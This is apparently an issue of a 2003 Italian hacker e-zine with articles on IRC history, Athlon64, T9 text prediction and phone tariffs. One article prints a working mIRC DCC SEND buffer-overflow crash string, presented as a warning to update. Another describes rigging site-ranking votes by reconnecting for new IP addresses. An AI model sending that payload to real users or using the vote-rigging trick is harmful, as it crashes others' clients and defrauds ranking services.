e  i  server  di  Oululu collegarono a Göteborg, Svezia,  e  crearono  la  prima
connessione internazionale, seguiti presto da Boston, Massachusetts, sebbene  le
connessioni non fossero stabili. A quei tempi su Internet molte delle principali
connessioni  odierne non esistevano. Inoltre, la comunicazione non  avveniva  su
linee dedicate, specialmente a livello trascontinentale e oltre oceano. "La rete
Internet" era spesso soggetta ai limiti della normale rete telefonica e  le  sue
tariffe la rendevano un lusso costoso, anche per gli istituti d'insegnamento del
Nord  Europa  e  degli Stati Uniti che non potevano supportarlo facilmente.   Da
allora  IRC  si è diffuso in tutto il mondo insieme allo sviluppo  di  Internet,
come  parte  integrante. Il numero di utenti regolari ed occasionali  di  IRC  è
impossibile da stabilire, ma probabilmente raggiunge cifre molto grandi.  Finora
persone  di  più di 120 Paesi e territori di ogni parte del mondo e in  tutti  i
continenti hanno utilizzato IRC, che è quindi terzo alla posta elettronica e  al
World  Wide  Web  (WWW)  come  popolarità. Le prime richieste  di  popolarità  e
riconoscimento  di  IRC  giunsero  all'inizio  del  1991,  durante  l'operazione
militare per fronteggiare l'invasione del Kuwait da parte degli irakeni  (Desert
Storm),  come  nel settembre del 1993, in seguito al colpo di  stato  contro  il
presidente  Yeltsin  a Mosca, quando gli utenti IRC locali  trasmisero  rapporti
sulla  situazione  in tutto il mondo. Per quanto riguarda il pubblico  generale,
tuttavia, si è trattato semplicemente di "Internet" e pochi commentatori avevano
le conoscenze per descrivere i mezzi utilizzati. Con il tempo, la complessità di
tutti  gli  aspetti di IRC è aumentata enormemente, rendendo la  manutenzione  e
l'utilizzo  molto  più  complicati e coinvolgendo i suoi utenti  con  molti  più
dettagli  tecnici della maggior parte delle altre applicazioni Internet.  Irc  è
partito  nel 1988 con una manciata di utenti, ognuno dei quali era a  sua  volta
coinvolto nello sviluppo di software e nello stabilire regole che ora formano la
base  di  IRC.  Grazie al numero di istituzioni in tutto il  mondo  connesse  ad
Internet  che  è  aumentato  rapidamente  all'inizio  degli  anni  '90   e,   di
conseguenza,  al  gran  numero  di studenti di questi  istituti  che  ottenevano
l'accesso,  il numero di utenti normali crebbe fino a raggiungere un massimo  di
5.000  connessioni simultanee nel 1992. La politica fece presto il suo  ingresso
nella  comunità  IRC, tuttavia, e risultò chiaro che non tutti condividevano  la
stessa  visione  del  futuro.  Alcuni decisero di  seguire  la  propria  strada,
suddividendo la prima rete di server IRC in altre più piccole , sebbene poche di
queste reti distaccate sopravvissero a lungo. Ma i cambiamenti hanno reso  l'IRC
moderno  ancora  più  complicato, dato che le reti  esistenti  seguono  numerosi
standard  invece  di aderire a un protocollo comune di metodologie  tecniche  ed
amministrative...
Ragazzi  poi questo documento qui continua ancora ma la parte importante  vel'ho
pastata  tutta!! Ora se mi permettete vorrei proseguire quello che  era  il  mio
discorso  per  arrivare a quello che sarebbe il fine di questo articolo  ;)  ...
dunque  ora  sono  sicuro che tra tutti i "navigatori"  di  IRC  la  percentuale
maggiore  usa  (o ha usato in passato) il client MIRC hhihihi dai quanti  ce  ne
sono li tra il pubblico? Hihihih comunque il tutto non mi stupisce affatto, Mirc
è  semplice  da utilizzare anche per chi è alle prime armi, la configurazione  è
basilare ed è anche un prodotto molto stabile! Ben fatto Khaled Mardam-Bey!!  Si
è  questo  il  nome  del tizio che nell 1992, agli albori dell'era  dell'accesso
remoto  tramite finestre di Internet, ha scritto questo client!! Da allora  Mirc
ha  subito continui aggiornamenti per riflettere i desideri e le esigenze  degli
utenti,  nonchè  gli sviluppi del mondo IRC!! Che storia mi  vien  da  piangere!
Hheheeheh Ma adesso scaldatevi perché arriva il bello!! Dunque penso che un  po'
tutti  i  "chatterini" conoscano il termine DCC vero? DCC sta per direct  client
connection  =  connessione diretta tra client (wagliù per i più TOC  TOC  ...  è
quello che usate per mandare le vostre foto o altre cose agli altri utenti)  ...
Il glossario informatico si esprime così : è un mezzo per scambiare file tra due
utenti  connessi ad un server irc. La connessione si attiva tra i due  client  e
quindi  non  passando dal server non risente del lag e non è  controllabile!!  È
proprio  quest'ultima  parola  che ha provocato lo  scandalo  eheheh  ebbene  si
ragazzi  il  DCC  non  è controllabile, anche il Mirc ha una  falla.  Attenzione
perché  l'intelligentone del creatore non è un fesso qualunque e appena scoperta
tale  falla  ha subito tappato il buco e ha messo in rete la versione aggiornata
del  mirc senza questo piccolo problemino. La versione buona è la versione  6.12
che  potete scaricare all'indirizzo : http://www.ircresource.it/mirc/mirc612.exe
.  Ma  comunque  non tutti gli utenti di mirc conoscono questa  falla  e  quindi
potremmo  dire che questo articolo ha il compito di informare tutta la gente  di
rinnovare  la  loro  situazione  scaricando  il  client  aggiornato!!  Prima  di
concludere definitivamente con questo discorso voglio spiegare ai più portati  e
ai  più  interessati  in  che consiste la falla e come  funziona!!  Ehehehhe  mi
raccomando  non fate i "bicchirini" in rete(e chi me vo' capì ... capisc!!!  Ca'
nisciun' e fess!!) perché se lo vengo a sapere non vi spiego più niente!  Dunque
la  vulnerabilità  del  mIRC  DCC  SEND Buffer Overflow  Vulnerabilità  consiste
nell'inviare un dcc del tipo :

/quote PRIVMSG #mirc :^ADCC SEND "a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a" 1363975063 3500 4^A


per provocare un errore fatale nel client e quindi un crash !!! Tutto qui :)  vi
rendete conto quanto sono pericolose queste poche stringhe qui su?? Per chi  non
lo  sapesse il crash indica il blocco imprevisto di un programma o il guasto  di
un'unità  disco.  Un crash di programma causa la perdita di  tutti  i  dati  non
salvati  e  può  lasciare il sistema operativo tanto instabile da richiedere  il
riavvio  del  calcolatore.   Ehheeh naturalmente con il  client  aggiornato  non
avrete di questi problemi!! Chiaro? C'è anche chi per risolvere il problema  usa
il  comando "/ignore -wd *" ... wd sta per without quotes ma questo implica  che
il  client rifiuta automaticamente tutti i DCC ... e se poi un vostro amico deve
mandarvi  qualche cosa? Bah ... comunque fate come volete hhihihii io l'articolo
velo  ho  scritto...  vi  ho spiegato un po' di tutto, avrò  creato  un  po'  di
confusione  nelle vostre testoline ma comunque spero che almeno ho perso  questa
mezz'oretta per qualcuno!! Mo vi saluto e mi vado a ripetere Inglese che  domani
tengo il compito eheheh ciao a tutti

+-[Cyberdude]-----------------[Informazionelibera founder]--+
| mailto  : cyberdudeIL@libero.it ~ cyberdudemail@libero.it |
| website : www.informazionelibera.cjb.net                  |
+-----------------------------------------------------------+


+--------------------------------------------------------------[open the file]-+
|[ RECENSIONI ]                                                                | 
|-- 64bit-The revolution is begining                                           |
|-- SysOv3rrid3 <SysOverride@libero.it>                                        |
|                     _________________________________________________________| 
|____________________/
+----------------------------------------+
+About the article... 		         +
+----------------------------------------+
+ NAm3:  SysOv3rrid3 		         +                        
+ TitLe: 64bit-The revolution is begining+
+ E-mail: SysOverride@libero.it          +
+ CrEw: InfomazioneLibera	         + 
+ sUondtR4cK: Puddle of Mudd - Come clean+
+----------------------------------------+
*_____________*
| DESCLAIMER  |
*_____________*

Tutte    le    informazioni contenute in questo file   sono   a    puro    scopo
Didattico/informativo,  quindi l'autore non si ritiene  responsabile  per  l'uso
Improprio da parte di terzi delle informazioni qui contenute.


:-[sTart]-:
Salve cari lettori di IL, eccoci qui ritrovati per parlare questa volta, non  di
programmazione com'è solito nei miei articoli, ma di hardware. In particolare vi
presenterò (per chi ancora non lo conoscesse), il nuovo processore Athlon64, che
sembra  avere  tutte  le  carte  in  regola  per  essere  considerato  come   il
<Rivoluzionatore> del sistema. Ma iniziamo subito a fare conoscenza  con  questa
new  entry:  come  avrete capito dal nome la novità di questo  processore  è  la
capacità  di  elaborare  non solo istruzioni composte da  32bit,  ma  istruzioni
composte  da  64bit,  se  prima con 32 bit si potevano avere  2^32  combinazioni
differenti  di 0 1, provate ad immaginare ora...!!! Questi "mostri" elettronici,
comunque  sono  in grado anche di eseguire operazioni a 32bit,  ma  si  può  ben
capire  che così non si sfrutta tutto il loro reale potenziale, anche perché  le
attuali  applicazioni  non  hanno  bisogno  di  64  bit,  ma  32  sono  più  che
sufficienti. Per non parlare della RAM di 2GB!!!Comunque scendendo un pò più nel
tecnico,  notiamo che una delle particolarità di questo sistema è l'integrazione
del  NorthBridge(componente del chipset della scheda madre, che  si  occupa  del
controllo  del  traffico delle informazioni tra processore e  alloggiamento  AGP
delle  schede  video) all'interno del processore, con un notevole  guadagno  sul
tempo  di  latenza. Inoltre le comunicazioni tra processore e gli altri elementi
del  pc avvengono attraverso un bus di tipo HyperTransport che dispone una banda
di  6.4GB/s. Ultima e non meno importante novità l'utilizzo di una memoria cache
di ben 1MB. Tra le versioni rilasciate il 23 settembre, troviamo però a sorpresa
due  modelli:  Athlon64  e  l'Athlon64 FX, vediamo  le  differenze:  il  modello
Athlon64  è  la  versione base degli elaboratori AMD con architettura  a  64bit,
mentre il modello Athlon64 FX(51) è il più potente tra i suoi colleghi anche  se
lavora a frequenze inferiori rispetto a i processori di casa Intel. Comunque  le
differenze  tra  questi  due  modelli  non  sono  poche,  sono  diverse,  ma  la
sostanziale  è  l'utilizzo di una Ram di tipo ECC, con  il  controllo  d'errore.
Altra  importante  caratteristica di questi nuovi processori è  l'aumento  delle
fasi  del  ciclo Fetch. Da 10 fasi si è passati a 12, e come sempre i  pro  e  i
contro  non  mancano. Iniziamo dai pro: con l'aumento della pipeline  si  ha  il
vantaggio  di concludere più velocemente ogni fase di un'operazione, ma  ecco  i
contro:  con  l'aumento delle fasi aumenta il conseguente rischio  di  errore  e
quindi maggior tempo per azzerare gli stadi e ricominciare nuovamente. Ed infine
parliamo  di un argomento caro,per certi versi, a i programmatori: il linguaggio
di  questi  processori. Il <vecchi> processori a 32bit utilizzano il  linguaggio
base chiamato x86, mentre ora per i processori a 64bit se ne sono sviluppati due
tipi:  quello  della  Intel  chiamato IA-64, per i suoi  processori  a  64bit  i
Itanium(utilizzati  per  mainframe e workstation) che è risultato  essere  molto
potente ma non compatibile sviluppate per pc a 32bit, mentre l'AMD ha sviluppato
x86-64 perfettamente compatibile con entrambe le tecnologie.
:-[EoF]-:
Termina  qui  questa  breve  presentazione dei nuovi processori,  presto  se  ne
sapranno  molte  di più in merito, comunque per ora gustatevi quest'anteprima!!!
Byez e alla pR0xIm4!!!

C0ntact:
-+ IRC irc.azzurra.org cH4n #Sh3ll, #infomazionelibera, #Hacker.it
-+ MAIL Sysoverride@libero.it

                                             -=:[SysOv3rrid3]:=-







--> Questo è il core dei processori Athlon64. 100% Highest Technology!!!
 
+--------------------------------------------------------------+
|H ------------------------------>  | <---------------------   |  
|Y  +-----------------------------------------------------+ D  |
|P  |	FLOATING POINT UNIT	|		          | D  |
|H  |---------------------------|			  | R  |
|E  |  LOAD/STORE  | DATA CACHE	|			  |    |	
|R  |---------------------------|			  | M  |
|T  |  EXECUTION UNITS	  |BUS	| 			  | E  |
|R  |---------------------|UNIT |    L2 CACHE 1MB	  | M  |       
|A  |	FETCH SCAN |      |-----|                         | O  |
|N  |    ALING     |INSTRUCTION |			  | R  |
|S  |	MICRO-CODE |	CACHE	|			  | Y  |
|P  |		   |		|			  |    |	
|O  |---------------------------|			  | I  |	
|R  |	MEMORY CONTROLLER       |			  | N  |	
|T* |				|			  | T° |	
| | +-----------------------------------------------------+  | |
| ------------------------------>   | <----------------------  |	
+--------------------------------------------------------------+

* HyperTransport Technology
° DDR Memory Interface


+--------------------------------------------------------------[open the file]-+
|[ ESPERIMENTI ]                                                               |
|-- Rapporto 6266 in T9                                                        |
|-- Unrelated <unrelated@libero.it>                                            |
|                     _________________________________________________________| 
|____________________/
...••••••••...••••••••..........          Rapporto 6266 in T9         ..........
.••••••••••••••••............          Lord Unrelated Lodeguns .................
.................................       15 Novembre 2003 22.25  ................

Bene, bene eccomi a diquisire di qualcosa che mi gusta molto... chi di voi si  è
sempre  chiesto  ma  come  fa il telefonino a intuire  quello  che  scrivo?  Beh
diciamo  che  in questo tutor elaborerò delle mie ipotesi, ripeto  ipotesi,  sul
possibile  funzionamento del "testo su 9 pulsanti"... prima di tutto  prendo  il
mio  cellulare  e  studio  attentamente quello che faccio  quando  compongo  una
parola...  voglio  scrivere ciao, quindi prendo il mio  caro  vb  e  traduco  il
possibile metodo per scrivere questa innocentissima parola,cosa mi esce fuori?


 If Text1.Text = "24" Then
 Text2.Text = Text2.Text + "ci"
 Text1.Text = ""
 ElseIf Text1.Text = "25" Then
 Text2.Text = Text2.Text + "ak"
 Text1.Text = ""
 ElseIf Text1.Text = "26" Then
 Text2.Text = Text2.Text + "ao"
 Text1.Text = ""
 End If

cioè  ragionandoci sopra possiamo intuire subito che per una  coppia  di  numeri
abbiamo  una  coppia di lettere, quindi scrivendo tipo "2426"... avremmo  "CIAO"
scrivendo invece "2425" avremmo ciak... quindi ad occhio inesperto uno  potrebbe
dire  problema  risolto se ho voglia di rompermi la schiena a  mettermi  a  fare
tutti  i collegamenti e scrivere tutte le coppie di lettere.... e poi ci sta  un
altro piccolo problema, come diavolo faccio a scrivere le parole  dispari?  bene
smanettando  un  altro pò con il cellulare, capisco un altra cosa  che  potrebbe
essere  alla  base  logica della struttura di una parola,  cioè  scopro  che  in
effetti  il T9 attiva una specie di doppia analisi della parola come?  Prendiamo
come esempio "MAMMA" = 62662 dopo varie prove mi accorgo che 79 piglia il 62"MA"
poi  analizza  66  "MM"  +  62"MA",  ma  questa  spiegazione  lascia  un  pò   a
desiderare...  quindi mi rimetto a smanettare.. e faccio una specie  di  tabella
facendo uscire tutte le opzioni possibili di traduzione del  62,



 62
 MA
 MC
 MB
 NA
 OC
 OB
 OA
 NB
 NC

e  trovo questa accoppiata di lettere che sono guarda un pò... in tutto 9 bingo!
Le  ipotesi che avevo sono fondate allora. Ma ritorniamo a capire quindi come si
sommano ste diavolo di lettere.


 62       66       62     62+66-6+2
 MA--     NO    -> MA     ma+mm-m+a
 MC  |    ON   |   MC     na+nn-n+a
 MB   --> MM --    MB     ma+nn-n+a
 NA       NN       NA
 OC       MO       OC
 OB       Mò       OB
 OA       Nò       OA
 NB       OM       NB
 NC       MN       NC

in questa specie di reversing non invasivo possiamo intuire che T9 non caccia le
lettere  a  testa ma segue una regola ben  precisa...  cioè  statisticamente  fa
apparire  prima   quelle   più  comuni...  non  è  da   escludere   che   queste
combinazioni  siano  prima state fatte in una tabella  e  poi   algoritmicamente
programmate, ricordo che sono sempre ipotesi di uno che non sta  bene   con   la
testa,  ma proviamo a fare una tabella...        anche se è una pazzia  fare  in
asci 9x9=81 caselle... lo farò anche perchè sono sotto l'effetto di caffeina. E'
un    poco    come   giocare   agli  scacchi  nell'entrare   nella   testa   del
programmatore   che  con  questa  idea  si  è  fatto ricco e non  programmerà  +
sicuramente...



           NO    ON    MM    NN    MO    Mò    Nò    OM    MN  66
         |----||----||----||----||----||----||----||----||----|
       MA|6662||    ||    ||    ||    ||    ||    ||    ||    |
         |----||----||----||----||----||----||----||----||----|
       MC|    ||    ||    ||    ||    ||    ||    ||    ||    |
         |----||----||----||----||----||----||----||----||----|
       MB|    ||    ||    ||    ||    ||    ||    ||    ||    |
         |----||----||----||----||----||----||----||----||----|
       NA|    ||    ||    ||    ||    ||    ||    ||    ||    |
         |----||----||----||----||----||----||----||----||----|
       OC|    ||    ||    ||    ||    ||    ||    ||    ||    |
         |----||----||----||----||----||----||----||----||----|
       OB|    ||    ||    ||    ||    ||    ||    ||    ||    |
         |----||----||----||----||----||----||----||----||----|
       OA|    ||    ||    ||    ||    ||    ||    ||    ||    |
         |----||----||----||----||----||----||----||----||----|
       NB|    ||    ||    ||    ||    ||    ||    ||    ||    |
         |----||----||----||----||----||----||----||----||----|
       NC|    ||    ||    ||    ||    ||    ||    ||    ||    |
         |----||----||----||----||----||----||----||----||----|
       62

Come  possiamo vedere ora le combinazioni sono molto + chiare, mi  balza  subito
all'occhio  la prima combinazione che testo sul telefonine e che in   un   certo
senso  soddisfa  la  teoria  dell'accoppiamento  numeri  detta  prima,   cioè

 6266 = MANO
        NANO
        MANN
        MAMM
        NANN
        MAOM

Il  telefonino non capisco perchè in questo caso mi restituisce solo 6 soluzioni
per  il 66 e solo 2 per il 62. La questione mi puzza e mi fa pensare che abbiamo
fatto  collegamenti e manuali... ma studiando ancora più  a  fondo la situazione
induco che la scelta del 66 viene dettata dal 2"A" del 62. ummm probabile  ma  a
questo punto cosa decide la sceltà di A?  statistica  e quindi scelta manuale  o
risultato matematico di un altro calcolo che fa lontano  dai nostri occhi?

se diamo uno sguardo alla tastiera del telefonino vediamo raggruppati 2 e  6:

      ___________
      | 2  |  6 |
      ___________
      | A  |  M |
      | B  |  N |
      | C  |  O |


quindi  in  teoria  la A  è legata da  M N O  cioè le sue "sottolettere"  quindi
teoricamente   il  2"A"  è  legato  a tutte le lettere del 6"M"N"O"  ma  non  al
contrario e così fino alla fine della parola.


 A ----> AM
         AN
         AO

L'unico problema è che non mi varia del tutto la prima lettera precedente ad A e
questo  non  è  spiegabile matematicamente se non dal  fatto  che   T9   fa   un
ragionamento "statistico" il quale fa comparire solo le soluzioni possibili. Ora
quindi  la  domanda  sorge  spontanea: Ke tipo di ragionamento  fa?  Come  fa  a
scegliere quale è giusto o quale è sbagliato? Pensando pensando...  mi fotte  il
fatto  che  la  O  non  mi comapare allora faccio l'ipotesi   della   statistica
componimento come calcolo del programma, infatti

 OA
 OB
 OC

non hanno nessun senso legati con

 NO    ON    MM    NN    MO    Mò    Nò    OM    MN

perciò credo parta per la esclusione degli pseudo-omonimi...    ritornando  alle
priorità  della tabella possiamo intuire che la teoria non è del  tutto   errata
infatti  notiamo  che  ordina ogni coppia con una  logica   diversa   da  quella
ordinatrice normale, infatti notiamo che

 62   e non
 MA         MA
 MC         MB
 MB         MC
 NA         NA
 OC         NB
 OB         NC
 OA         OA
 NB         OB
 NC         OC

perciò per logica rifacciamo la tabella tracciando  le  priorità  per  le  quali
sceglie alcune lettere al posto delle altre...


       MM    MN    MO    Mò    NM    NN    NO    Nò    OM    ON    OO    Oò  66
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   MA|13445||    ||    ||    ||    ||    ||  1 ||    || 5  ||    ||    ||    |
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   MB|     ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    |
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   MC|     ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    |
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   NA| 25  ||    ||    ||    ||    || 35 ||  2 ||    ||    ||    ||    ||    |
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   NB|     ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    |
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   NC|     ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    |
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   OA|     ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    |
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   OB|     ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    |
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   OC|     ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    ||    |
     |-----||----||----||----||----||----||----||----||----||----||----||----|
   62


così  forse non ci capite niente, ma ora vi reincollo la i legami che  ha  fatto
con la tabella 6266

        MANO 1
        NANO 2
        MANN 3
        MAMM 4
        NANN 5
        MAOM 6

Non  c'è  che dire hanno fatto un lavoraccio statistico stupefacente per  creare
questo algoritmo quelli della Tegic Communications, io limitandomi a studiare il
rapporto  6266   mi   sono  disgregato  mezza massa neurale  stando  icollato  a
queste  iduzioni a priori da oggi pomeriggio alle 16 fino alle 22 con  una  sola
pausa  per  la cena :D lol... ma credo che ne sia valsa la pena ...     comunque
continuerò  a studiarmelo finchè non  capirò  completamente  ed  in   ogni   suo
piccolo  particolare il  segreto  che  si   cela   dietro   queste   operazioni.
Ciao gente e a presto dal vostro Francesco Bardozzo...           studiatee!!!

--< unrelated at libero dot it >------------------------------------------------
--------------------------------------¤ Lord Unrelated Lodeguns ¤---------------
¢•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••



+--------------------------------------------------------------[open the file]-+
|[ FILOSOFIA HACK ]                                                            |
|-- Cosa comportano i nuovi piani tariffari                                    |
|-- Bigalex <b1galez@hotmail.com>                                              |
|                     _________________________________________________________| 
|____________________/
Secondo  tutorial del giorno... e pensare che domani ho il compito di  fisica  e
dovrei  studiare... :/ Quando all'inizio nacque  il telefono, le tariffe  furono
fatte  a  misura di utente. Gli utenti telefonici potevano chiamare secondo  una
tariffa  che  faceva a loro comodo. Le tariffe si adattavano agli utenti.  E,  a
sentire  coloro  che usavano il telefono, erano delle buone tariffe.  Col  tempo
sono  state  fatte sempre  nuove tariffe che, - per come dicono loro  -  vengono
sempre più incontro all'utente. Ed arriviamo poi al giorno d'oggi. Ci sono mille
gestori  telefonici, duemila provider, cimquemila  tariffe per   ogni  servizio.
Siamo  stati   ormai  invasi dalle tariffe. Ed  ovviamente ogni  tariffa  sembra
essere  la  migiore. Alla fine qualunque tariffa scegliamo,  sembra  poco   dopo
dimostrarsi  la   peggiore tra tutte. E' davvero uno  scempio. Le  tariffe   non
sono più le  stesse di una volta, non  ci sono più le  mezze stagioni e  venezia
è  bella  ma  non  so  se  ci vivrei. Le tariffe ormai costringono  l'utente  ad
adattarsi a loro e non  fanno il contrario. Le tariffe sono state fatte  apposta
per   far   impazzire  l'utente,  sembrano  flessibili,  e  tutto  sono  fuorchè
flessibili. La tariffazione al secondo della wind ad esempio ti fanno  contare i
secondi  che  dura una telefonata, e se dura più di pressappoco due  minuti,  ti
accorgi che ti sarebbe convenuto chiamare con la vecchia cara telecom. Sei stato
fatto  fesso. E magari  neppure te ne accorgi. Specialmente le persone   anziane
sono  'abbabbiate'  da quegli  stronzi  dei call center che  ti  propongono  una
tariffa del cazzo, sconvenientissima, che è buona  sono per 5 minuti  al  giorno
e che  te la fanno sembrare ottima. La legge sulla trasparenza a poco è servita.
Se  ne  inventano  di tutti  i tipi per farti  fesso. Ho letto di una fantastica
offerta   ADSL  biennale: il  primo  anno è totalmente gratuito, ma  il  secondo
costa  60  euro  al  mese. Un affare. Alla fine queste nuove  tariffe  che  sono
sconvenienti,  per  nulla  elastiche  (e direi  neppure  convergenti,  dato  che
convergenti significherebbe che  utente e gestore  arriverebbero ad  un  accordo
conveniente ad entrambi) e ti 'abbabbeano' sono solo delle truffe legalizzate. E
chi  ci   rimette  è  sempre   l'utente. E ora non contenta  della   situazione,
Tiscali ha  proposto l'ADSL a tempo, seguito poi immediatamente da Infostronzi e
Telecozz. Come se uno si mettesse  l'ADSL solo per  andare più veloce. Ma chi se
ne  frega  della  velocità, l'importante  è avere  il collegamento  ad  Internet
tutta la  giornata! E ancora una  volta è l'utente che deve  adattarsi. L'utente
deve  pagare   e non può  neppure dirsi soddisfatto  del servizio.  Bisognerebbe
organizzare   qualcosa  e farglielo  capire, ma continuando   così  gli   utenti
diventeranno utonti e non si ribelleranno più. Che dire… la forza è nelle vostre
mani.

--
BiGAlex
E-Mail: b1galez@hotmail.com


+--------------------------------------------------------------[open the file]-+
|[ FILOSOFIA HACK ]                                                            |
|-- Classifiche siti taroccabili                                               |
|-- Tailot <webmaster@tailot.zzn.com>                                          |
|                     _________________________________________________________| 
|____________________/
Salve  a  tutti... frrrrrrr, aspè aspè ecco, scandisco la voceee puaa puaa,  bhe
dalle  righe  di  presentazione avrete capito che si tratta di  tailot  !!!!  In
questo  articoletto  se così possiamo kiamarlo vi parlerò di  un  difettino  che
avvolge  le  top dei migliori siti in italia!!! Tutto ciò che dirò adesso......è
solo  per  far  capire  che  ancora il servizio è  da  migliorare....quindi  non
offendetevi  ne  con  la  crew e neanche con me, anche perchè  non  è  nulla  di
eccezionale  ma solo una tecnica che vi aiuterà a capire che le classifiche  dei
siti  sono  taroccabili  in  qualsiasi momento ......  Arriviamo  al  dunque....
Requisiti  per  fare il vostro esperimento: Una connessione Adsl Alice  (poi  vi
spiego il perchè proprio questa...le altre le devo ancora testare) Un sito tutto
vostro  (altrimenti del trucco non ve ne fate un caxxo) una bottiglia  di  birra
(questa è opzionale hehehehhe)

Adesso  dopo  che  vi  siete  registrati ad altervista  (non  solo  funziona  su
altervista)  ed  avete publicato il vostro sito, inserite  il  codice  html  per
partecipare  alla  top dei siti!! A questo punto...... guardate  cosa  ho  fatto
io....:
alle ore 21.08.10     il mio IP era: 62.211.266.173
voto e scollego
alle ore 21.11.58     il mio IP era: 80.116.232.23
voto e scollego
alle ore 21.14.03     il mio IP era: 80.117.213.115
voto e scollego
alle ore 21.18.23     il mio IP era: 62.222.221.177
voto e scollego
NEL  GIRO DI 10 MINUTI BEN 4 VOTI, PER CUI 60 MINUTI 24 VOTI....in un giorno ben
576  voti  mhmmmmmmmmmmmm se guardate il mio ip ogni tre minuti  che  collego  e
ricollego  con  connessione  alice CAMBIA...... per  cui  ogni  3  minuti  posso
benissimo votare il mio sito e quello dei miei amici................. Ma noooooo
!!  vi sembra giusto ??? A questo punto a voi di altervista e non solo vi chiedo
di  garantire  un  servizio stabile e non fasullo!!!  RICORDO  CHE  STO'  USANDO
ALTERVISTA  COME  ESEMPIO!!!  POTREI BENISSIMO CITARE  ALTRE  TOP  FASULLE  COME
mistertoppy,  top  100  .....ecc.  Colgo  l'occasione  per  salutare  tutta   la
crew.........


BY TAILOT
                              Per ulteriori informazioni:
                              WWW.TAILOT.CJB.NET
                              webmaster@tailot.zzn.com



+--------------------------------------------------------------[open the file]-+
|[ ERRORI NEL NUMERO PRECEDENTE ]                                              | 
|-- Erroraccio                                                                 | 
|-- Eimiar <jnsmith_86@hotmail.com>                                            |
|                     _________________________________________________________| 
|____________________/
 +----------------------------------------------------------------------------+
 |Eimiar - 7H3 N4M3 WR073 0N 7H3 5M0K3                                        |
 | ...PrEsEnTs...                                                             |
 |                                                                            |
 |EROREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREE|
 |ROREEROREEROREERORE  ERRORACCIO NEL PROGETTO F2B EROREEROREEROREEROREEROREER|
 |OREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREEROREERO|
 |                                                                            |
 |scusatemi, nella riga dove sta scritto:                                     |
 | IF CH=192 THEN STRINGA:='11000010';                                        |
 |sostituite con:                                                             |
 | IF CH=192 THEN STRINGA:='11000000';                                        |
 |                                                                            |
 |a posto...                                                                  |
 |                                                                            |
 +----------------------------------------------------------------------------+

+------------------------------------------------------------------------------+
|[ iNfO ]======================================================================|
+------------------------------------------------------------------------------+
[ I NUMERI PRECEDENTI]---------------------------------------------------------+
| INFORMAZIONELIBERA 00 <----- 30 articoli ---------------> 06 Maggio 2003     |    
| INFORMAZIONELIBERA 01 <----- 29 articoli ---------------> 06 Giugno 2003     |                                   
| INFORMAZIONELIBERA 02 <----- 35 articoli ---------------> 27 Giugno 2003     |
| INFORMAZIONELIBERA 03 <----- 30 articoli ---------------> 15 Settembre 2003  |
| INFORMAZIONELIBERA 04 <----- 32 articoli ---------------> 20 Ottobre 2003    |
+------------------------------------------------------------------------------+
[ DOVE CI TROVATE ]------------------------------------------------------------+
|-[ Irc Server ]--[Net36.azzurranet.org - irc.azzurranet.org]------------------|
|-[ Porta ]-------[6667]-------------------------------------------------------|
|-[ Chan ]--------[#Informazionelibera]----------------------------------------|
|-[ Web site ]----[http://www.informazionelibera.cjb.net]----------------------|
|-[ Mailto ]------[cyberdudeIL@libero.it ~ cyberdudemail@libero.it]------------|
+------------------------------------------------------------------------------+
++=================[ ©Copyright Informazionelibera® Crew 2003 ]===============++

++===================[ http://www.informazionelibera.cjb.net ]================++
++=============================[ In continuo progresso ]======================++
...


					
                  _.-"""-._		
                .'         `. Stampa Underground-> INFORMAZIONELIBERA® E-ZINE05  
               /             \	                                
              |               |	     [ ©Copyright 20 Novembre 2003 ] 
              |               |	     http://www.informazionelibera.tk	
              |               |	     
               \             /                               _.-"""-._
              _.`.         .'.                            .'         `.
             |`-._`-.._..-'_.-|                          /             \
             |  _ `-._ _.-'   |                         |               |
             | | `-._ " _.-'| |                         |               |
             | |    || |    | |                         |               |
             | |    || |    | |                          \             /
             | |    || |    | |                          _`.         .'.
             | |    || |    | |                         |`-.`-.._..-'.-'|
             | |    || |    | |                         |    `-._.-'    |
             | | _.-'| |_   | |                         | |`-._   _.-'| |
             | |'_.-'| |_`-.| |                         | |   || |    | |
            |_.-'    | | `-._ `._|`-._                  | |   || |    | |
               -._   | |     ``---._  `-._              | |   || |    | |
                   .-' `-._|`-._    ``-._ `-._          | |   || |    | |
                       |-._     `-._     `--._`-._|`-._ | |   || |    | |
                           `-._     `-._      ``---._  `| |   || |    | |
                               `-._     `-._|`-._    ``-| |`-.|| |    | |
                                   `-._          `-._   | |-._ | |._  | |
                                       `-._          `-.| |   `| |_ `-| |
                                           `-._       _.| |    | | `.-| |
tO ConcacT us: <cyberdudeIL@libero.it>         -'|_.-'_.-'     | |_.-'  |